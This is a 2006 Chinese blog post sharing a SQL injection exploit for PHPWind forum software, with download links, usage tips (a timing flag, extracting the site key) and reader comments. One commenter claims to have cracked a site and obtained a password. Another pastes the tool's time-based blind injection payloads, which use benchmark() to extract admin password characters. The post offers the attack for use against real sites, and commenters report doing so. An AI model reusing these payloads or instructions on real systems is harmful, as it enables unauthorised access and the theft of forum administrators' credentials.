首页 » 工具收集 » PHPWIND SQL injection exploit [附演示动画]

PHPWIND SQL injection exploit [附演示动画]

2006/11/15 8:48 | 鬼仔 | 工具收集 | 占个座先

信息来源:Cnlnfjhh's Blog

前段时间的DZ,这些天的phpwind,闹的老外都关注了。
几天前www.milw0rm.com已经公布了另一个SQL injection exploit
代码大家都已经有了吧,不是剑心的,是国外的。
偶找了个动画给大家观看。
大家先看完这个,再去尝试Sql吧

点我下载动画演示
PS:
-t为时间,一般为10-15分钟
-t10
需要提取phpwind的key,密匙。如果不行就换另一个。

点我下载执行代码
PS:
前提条件:php.ini中的
short_open_tag = off

Tags: , ,

相关日志

楼被抢了 6 层了... 抢座Rss 2.0或者 Trackback

  1. like Reply to this comment 2006/11/15 10:16 #1

    研究下!!

    呵呵 我也喜欢那个站 不过英文不好了!! :lol:

  2. like Reply to this comment 2006/11/15 10:26 #2

    看过了! 结果和我最后用LINUX测试的差不多,但是返回结果。。。。 很慢!! 而且那个漏洞说是只要低于5.0.1的版本都可以溢出! 我对几个站也试了,答案NO! !

    不知道 为什么 老外也会骗人??

    还是有别的方法?

  3. 叼个烟屁股 Reply to this comment 2006/11/15 11:09 #3

    前两天我就试成功了。。可是不知道这反回来的东西怎么个用法。。郁闷了。。麻烦房东讲讲了。。。

  4. 孤魂 Reply to this comment 2006/11/16 2:04 #4

    成功破解一个,并得到了他的密码

  5. 叼个烟屁股 Reply to this comment 2006/11/16 6:47 #5

    cookie prefix ->
    sql -> 9999999'/**/OR/**/(IF((ASCII(SUBSTRING(password,1,1))=0),benchmark(20000
    00,char(0)),-1))/**/AND/**/groupid=3/** MIT/**/1/*
    starttime -> 1163420863
    endtime -> 1163420868
    difftime -> 5
    sql -> 9999999'/**/OR/**/(IF((ASCII(SUBSTRING(password,1,1))=48),benchmark(2000
    000,char(0)),-1))/**/AND/**/groupid=3/** MIT/**/1/*
    starttime -> 1163420875
    endtime -> 1163420880
    difftime -> 5

    反回的这些怎么用。。郁闷了。不明白。。

  6. 鬼仔 Reply to this comment 2006/11/24 5:13 #6

    呵呵,具体的我也没测试。

发表评论